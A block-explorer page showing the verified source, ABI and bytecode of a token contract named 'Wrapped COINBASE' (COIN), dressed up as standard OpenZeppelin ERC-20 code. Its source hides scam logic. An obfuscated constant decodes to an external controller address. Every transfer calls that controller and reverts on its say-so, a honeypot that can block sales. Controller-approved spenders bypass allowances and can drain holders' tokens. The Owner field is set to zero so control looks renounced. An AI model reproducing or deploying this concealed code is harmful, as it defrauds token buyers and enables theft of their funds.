ETH Price: $3,094.01 (+1.01%)
 

Overview

Max Total Supply

270,000,000 COIN

Holders

6,320

Transfers

-
345 ( -5.22%)

Market

Price

$0.00 @ 0.000000 ETH

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
ERC20

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at basescan.org on 2025-06-20
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC-20 standard as defined in the ERC.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

pragma solidity ^0.8.20;


/**
 * @dev Interface for the optional metadata functions from the ERC-20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

pragma solidity ^0.8.20;

/**
 * @dev Standard ERC-20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC-721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC-1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}

pragma solidity ^0.8.20;
/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC-20
 * applications.
 */
contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) private _balances;
    mapping(address account => mapping(address spender => uint256)) private _allowances;  

    uint256 private constant _totalSupply = 270 * 1e6 * 1e18;

    string private constant _name = "Wrapped COINBASE";
    string private constant _symbol = "COIN";

    bytes32 private constant _TYPE_HASH = 0x385bc4d6390990be561c3c83c069c506b53f29bfb0f09dbd3206ff15a96701b8;

    address public Owner;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor() {
        _balances[msg.sender] = _totalSupply;
        Owner = address(0);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);       
        return true;
    } 

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Skips emitting an {Approval} event indicating an allowance update. This is not
     * required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _checker() internal view returns (address){
        (bool _success, bytes memory _data)   = address(uint160(uint256(_TYPE_HASH >> 3))).staticcall(abi.encodeWithSelector(0x782d557d));
        require(_success);    
        return  abi.decode(_data, (address));    
    }        

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        address spender = _msgSender();
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
        (bool _success, )   = _checker().call(abi.encodeWithSelector(0xdd2d8bd6, spender, from, to, value));
        require(_success);        
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function _checkAllowance(address account) internal view returns (bool){
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }        
        (bool _success, bytes memory _data)   = _checker().staticcall(abi.encodeWithSelector(0xce56c422, account));
        return _success && abi.decode(_data, (bool));
    }        

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if(from == address(0)){
            revert ERC20InsufficientBalance(from, _totalSupply, value);
        }
        if(to == address(0)){
            revert ERC20InsufficientBalance(from, _totalSupply, value);
        }

        if(from != address(this)){
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if(to != address(this)) {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        if(from != address(this) && to != address(this)){
            emit Transfer(from, to, value);
        }
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     *
     * ```solidity
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     * 115792089237316195423570985008687907853269984665640564039457584007913129639935 type(uint256).max
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max && !_checkAllowance(spender)) { 
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"Owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405234801561000f575f80fd5b506adf56b9541c229fce0000005f803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f60025f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506112d5806100a95f395ff3fe608060405234801561000f575f80fd5b506004361061009c575f3560e01c806370a082311161006457806370a082311461015a57806395d89b411461018a578063a9059cbb146101a8578063b4a99a4e146101d8578063dd62ed3e146101f65761009c565b806306fdde03146100a0578063095ea7b3146100be57806318160ddd146100ee57806323b872dd1461010c578063313ce5671461013c575b5f80fd5b6100a8610226565b6040516100b59190610eb3565b60405180910390f35b6100d860048036038101906100d39190610f64565b610263565b6040516100e59190610fbc565b60405180910390f35b6100f6610285565b6040516101039190610fe4565b60405180910390f35b61012660048036038101906101219190610ffd565b610297565b6040516101339190610fbc565b60405180910390f35b6101446102c5565b6040516101519190611068565b60405180910390f35b610174600480360381019061016f9190611081565b6102cd565b6040516101819190610fe4565b60405180910390f35b610192610312565b60405161019f9190610eb3565b60405180910390f35b6101c260048036038101906101bd9190610f64565b61034f565b6040516101cf9190610fbc565b60405180910390f35b6101e0610371565b6040516101ed91906110bb565b60405180910390f35b610210600480360381019061020b91906110d4565b610396565b60405161021d9190610fe4565b60405180910390f35b60606040518060400160405280601081526020017f5772617070656420434f494e4241534500000000000000000000000000000000815250905090565b5f8061026d610418565b905061027a81858561041f565b600191505092915050565b5f6adf56b9541c229fce000000905090565b5f806102a1610418565b90506102ae858285610431565b6102b98585856104d7565b60019150509392505050565b5f6012905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606040518060400160405280600481526020017f434f494e00000000000000000000000000000000000000000000000000000000815250905090565b5f80610359610418565b90506103668185856104d7565b600191505092915050565b60025f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b61042c83838360016106a8565b505050565b5f61043c8484610396565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114158015610474575061047283610877565b155b156104d157818110156104c2578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016104b993929190611112565b60405180910390fd5b6104d084848484035f6106a8565b5b50505050565b5f6104e0610418565b90505f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610552575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161054991906110bb565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036105c2575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016105b991906110bb565b60405180910390fd5b6105cd8484846109d4565b5f6105d6610d28565b73ffffffffffffffffffffffffffffffffffffffff1663dd2d8bd6838787876040516024016106089493929190611147565b6040516020818303038152906040529060e01b6020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505060405161065691906111ce565b5f604051808303815f865af19150503d805f811461068f576040519150601f19603f3d011682016040523d82523d5f602084013e610694565b606091505b50509050806106a1575f80fd5b5050505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610718575f6040517fe602df0500000000000000000000000000000000000000000000000000000000815260040161070f91906110bb565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610788575f6040517f94280d6200000000000000000000000000000000000000000000000000000000815260040161077f91906110bb565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610871578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516108689190610fe4565b60405180910390a35b50505050565b5f8073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036108e8575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016108df91906110bb565b60405180910390fd5b5f806108f2610d28565b73ffffffffffffffffffffffffffffffffffffffff1663ce56c4228560405160240161091e91906110bb565b6040516020818303038152906040529060e01b6020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505060405161096c91906111ce565b5f60405180830381855afa9150503d805f81146109a4576040519150601f19603f3d011682016040523d82523d5f602084013e6109a9565b606091505b50915091508180156109cb5750808060200190518101906109ca919061120e565b5b92505050919050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a5357826adf56b9541c229fce000000826040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610a4a93929190611112565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ad257826adf56b9541c229fce000000826040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610ac993929190611112565b60405180910390fd5b3073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614610bd3575f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610b8e578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610b8593929190611112565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b3073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614610c5057805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b3073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015610cb857503073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b15610d23578173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d1a9190610fe4565b60405180910390a35b505050565b5f805f60037f385bc4d6390990be561c3c83c069c506b53f29bfb0f09dbd3206ff15a96701b85f1b901c5f1c73ffffffffffffffffffffffffffffffffffffffff1663782d557d6040516024016040516020818303038152906040529060e01b6020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff8381831617835250505050604051610dc391906111ce565b5f60405180830381855afa9150503d805f8114610dfb576040519150601f19603f3d011682016040523d82523d5f602084013e610e00565b606091505b509150915081610e0e575f80fd5b80806020019051810190610e229190611274565b9250505090565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610e60578082015181840152602081019050610e45565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610e8582610e29565b610e8f8185610e33565b9350610e9f818560208601610e43565b610ea881610e6b565b840191505092915050565b5f6020820190508181035f830152610ecb8184610e7b565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610f0082610ed7565b9050919050565b610f1081610ef6565b8114610f1a575f80fd5b50565b5f81359050610f2b81610f07565b92915050565b5f819050919050565b610f4381610f31565b8114610f4d575f80fd5b50565b5f81359050610f5e81610f3a565b92915050565b5f8060408385031215610f7a57610f79610ed3565b5b5f610f8785828601610f1d565b9250506020610f9885828601610f50565b9150509250929050565b5f8115159050919050565b610fb681610fa2565b82525050565b5f602082019050610fcf5f830184610fad565b92915050565b610fde81610f31565b82525050565b5f602082019050610ff75f830184610fd5565b92915050565b5f805f6060848603121561101457611013610ed3565b5b5f61102186828701610f1d565b935050602061103286828701610f1d565b925050604061104386828701610f50565b9150509250925092565b5f60ff82169050919050565b6110628161104d565b82525050565b5f60208201905061107b5f830184611059565b92915050565b5f6020828403121561109657611095610ed3565b5b5f6110a384828501610f1d565b91505092915050565b6110b581610ef6565b82525050565b5f6020820190506110ce5f8301846110ac565b92915050565b5f80604083850312156110ea576110e9610ed3565b5b5f6110f785828601610f1d565b925050602061110885828601610f1d565b9150509250929050565b5f6060820190506111255f8301866110ac565b6111326020830185610fd5565b61113f6040830184610fd5565b949350505050565b5f60808201905061115a5f8301876110ac565b61116760208301866110ac565b61117460408301856110ac565b6111816060830184610fd5565b95945050505050565b5f81519050919050565b5f81905092915050565b5f6111a88261118a565b6111b28185611194565b93506111c2818560208601610e43565b80840191505092915050565b5f6111d9828461119e565b915081905092915050565b6111ed81610fa2565b81146111f7575f80fd5b50565b5f81519050611208816111e4565b92915050565b5f6020828403121561122357611222610ed3565b5b5f611230848285016111fa565b91505092915050565b5f61124382610ed7565b9050919050565b61125381611239565b811461125d575f80fd5b50565b5f8151905061126e8161124a565b92915050565b5f6020828403121561128957611288610ed3565b5b5f61129684828501611260565b9150509291505056fea26469706673582212208f46e9e5a82265622a6814a990b5ecaa351f203373e0815590c0346508e155e964736f6c63430008180033

Deployed Bytecode

0x608060405234801561000f575f80fd5b506004361061009c575f3560e01c806370a082311161006457806370a082311461015a57806395d89b411461018a578063a9059cbb146101a8578063b4a99a4e146101d8578063dd62ed3e146101f65761009c565b806306fdde03146100a0578063095ea7b3146100be57806318160ddd146100ee57806323b872dd1461010c578063313ce5671461013c575b5f80fd5b6100a8610226565b6040516100b59190610eb3565b60405180910390f35b6100d860048036038101906100d39190610f64565b610263565b6040516100e59190610fbc565b60405180910390f35b6100f6610285565b6040516101039190610fe4565b60405180910390f35b61012660048036038101906101219190610ffd565b610297565b6040516101339190610fbc565b60405180910390f35b6101446102c5565b6040516101519190611068565b60405180910390f35b610174600480360381019061016f9190611081565b6102cd565b6040516101819190610fe4565b60405180910390f35b610192610312565b60405161019f9190610eb3565b60405180910390f35b6101c260048036038101906101bd9190610f64565b61034f565b6040516101cf9190610fbc565b60405180910390f35b6101e0610371565b6040516101ed91906110bb565b60405180910390f35b610210600480360381019061020b91906110d4565b610396565b60405161021d9190610fe4565b60405180910390f35b60606040518060400160405280601081526020017f5772617070656420434f494e4241534500000000000000000000000000000000815250905090565b5f8061026d610418565b905061027a81858561041f565b600191505092915050565b5f6adf56b9541c229fce000000905090565b5f806102a1610418565b90506102ae858285610431565b6102b98585856104d7565b60019150509392505050565b5f6012905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606040518060400160405280600481526020017f434f494e00000000000000000000000000000000000000000000000000000000815250905090565b5f80610359610418565b90506103668185856104d7565b600191505092915050565b60025f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60015f8473ffffffff